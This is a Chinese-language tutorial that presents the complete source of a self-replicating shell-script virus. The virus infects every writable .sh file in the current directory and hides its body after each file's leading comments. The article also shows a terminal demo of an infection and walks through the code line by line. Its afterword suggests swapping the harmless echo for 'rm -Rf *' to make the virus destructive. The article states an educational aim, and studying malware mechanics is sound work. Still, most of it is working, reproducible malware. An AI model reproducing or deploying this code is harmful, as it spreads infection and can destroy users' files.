【文中代碼,僅供參考!】
說起病毒總有點神秘的味道,想起以前用匯編編寫第一個dos病毒時是那么的痛苦從開始有設想到完成花了3個多月,而且寫的也是亂七八糟,最近突發奇想不就是感染其他文件,傳播自己嗎,用shell寫一個病毒且不是非常簡單,于是順手寫了如下這么一個小腳本,功能就是感染其他shell程序。
這個程序在現實意義不大,但對于形象的理解病毒傳播機制還是很很有幫助,可以算教學意義大于實際意義吧。
SHELL病毒簡介
1.前言
說起病毒總有點神秘的味道,想起以前用匯編編寫第一個dos病毒時是那么的痛苦從開始有設想到完成花了3個多月,而且寫的也是亂七八糟,最近突發奇想不就是感染其他文件,傳播自己嗎,用shell寫一個病毒且不是非常簡單,于是順手寫了如下這么一個小腳本,功能就是感染其他shell程序。
這個程序在現實意義不大,但對于形象的理解病毒傳播機制還是很很有幫助,可以算教學意義大于實際意義吧。
2.程序代碼
#!/bin/sh
#文件名:virus_demo.sh
#用途:shell病毒演示。
#說明:病毒將感染當前目錄下的所有.sh結尾的文件,但不會重復感染。
#編寫:watercloud@xfocus.org
#日期:2003-5-13
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Hi, here is a demo shell virus in your script !"
#E:<+!a%C&t:>
#EOF |
看shell是多么得強大,這么短短得程序就能感染其他程序文件。
3.演示
測試一下:
先在當前目錄放兩個文件,一個病毒文件,一個用來作被感染測試用。
[cloud@ /export/home/cloud/vir]> ls -l
drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./
drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../
-rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh
-rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.sh |
來看看我們這個“肉雞”腳本,很簡單:
[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
ls -l
#EOF |
好了開始感染他。
[cloud@ /export/home/cloud/vir]> ./virus_demo.sh
Hi, here is a demo shell virus in your script ! |
來看看感染后的結果:
[cloud@ /export/home/cloud/vir]> cat test.sh
#!/bin/sh
# Just a demo for virus test
# Author : foo
# Date : 3000-1-1
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Hi, here is a demo shell virus in your script !"
#E:<+!a%C&t:>
ls -l
#EOF |
看,病毒體:
#B:<+!a%C&t:> . . . .
#E:<+!a%C&t:> |
被拷貝過來了,這樣病毒就被傳播了。值得注意的是病毒體插入的位置是在源test.sh的有效程序行的開始處!這主要考慮到一般shell程序大家都喜歡在程序開始處作注釋說明,你好歹不能把別人的注釋信息給放到后面去,那也太明顯了吧。
來執行看看我們新的病毒體看看:
[cloud@ /export/home/cloud/vir]> ./test.sh
Hi, here is a demo shell virus in your script ! <-- 看,病毒體內部的打印信息。
-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh
-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh |
4. 簡單講解
我們來一步步分析一下這個病毒:#B:<+!a%C&t:>病毒體開始標記,用于程序復制自己定位用。vFile=$_ ; vTmp=/tmp/.vTmp.$$定義兩個變量,一個臨時文件,一個記錄當前程序名稱$_,這也就要求我們必須把這行作為程序有效行的第一行,如果放后頭我們就無法得到當前程序名稱,后面就找不到從哪里去找病毒體來拷貝了。
開始循環,找到當前目錄下的所有.sh結尾的程序。
if [ ! -w $f -a ! -r $vFile ]; then continue; fi |
目標是否有寫權限,病毒源文件是否有讀權限。
if grep '<+!a%C&t:>' $f ; then continue; fi |
目標是否已經中毒很深無藥可救了,如果是這樣還給他再來一次也太不仁義了吧?
if sed -n '1p' $f | grep 'csh'; then continue; fi |
如果目標shell是以csh的那語法上差異太大了,放棄吧。
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi |
好了準備感染,先把目標拷貝一個備份,拷貝失敗了怎么辦?當然只好放棄了。
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp` |
這是干嘛?好像挺復雜,不過學shell病毒不了解awk和正規表達式好像有點說不過去吧,這個就是找到程序開始的注釋和空白行有多少,好方便我們確定病毒體插入點。
sed -n "1,${vNo}p" $vTmp >$f |
一個sed命令把目標文件的開始注釋部分從備份文件中copy回來。
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f |
再來一個sed完成搬運病毒體的工作。
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f |
最后一個sed把目標文件的其他部分搬回來,sed真強大呀!!
清理一下臨時文件。
循環結束。
unset vTmp ;unset vFile ;unset vNo |
清理一下犯罪現場。
echo "Hi, here is a demo shell virus in your script !" |
都感染了好歹也要顯示點東西以告訴別人這是個被病毒感染過的程序吧。
病毒體結束標記,用于程序復制自己定位用。
5.后記
從中我們可以看到腳本病毒非常簡單,不需要很多知識就能寫一個,而且病毒破壞力也是不可小視比如我們的程序里把echo信息改為rm -Rf * ;同時反方面也展示了shell的強大之處,試想傳統的程序光是處理PE文件結構和ELF結構就得花多少功夫。
上面得程序已經在Linux和Solaris上測試通過,Windows上得用戶在Cygwin上應該也行。
順便再強調一次,寫這篇文章得目的是和大家分享一下對病毒得理解,而不是教寫病毒出去害人,切記切記!
責任編輯: 雪花(TEL:(010)68476636-8008)
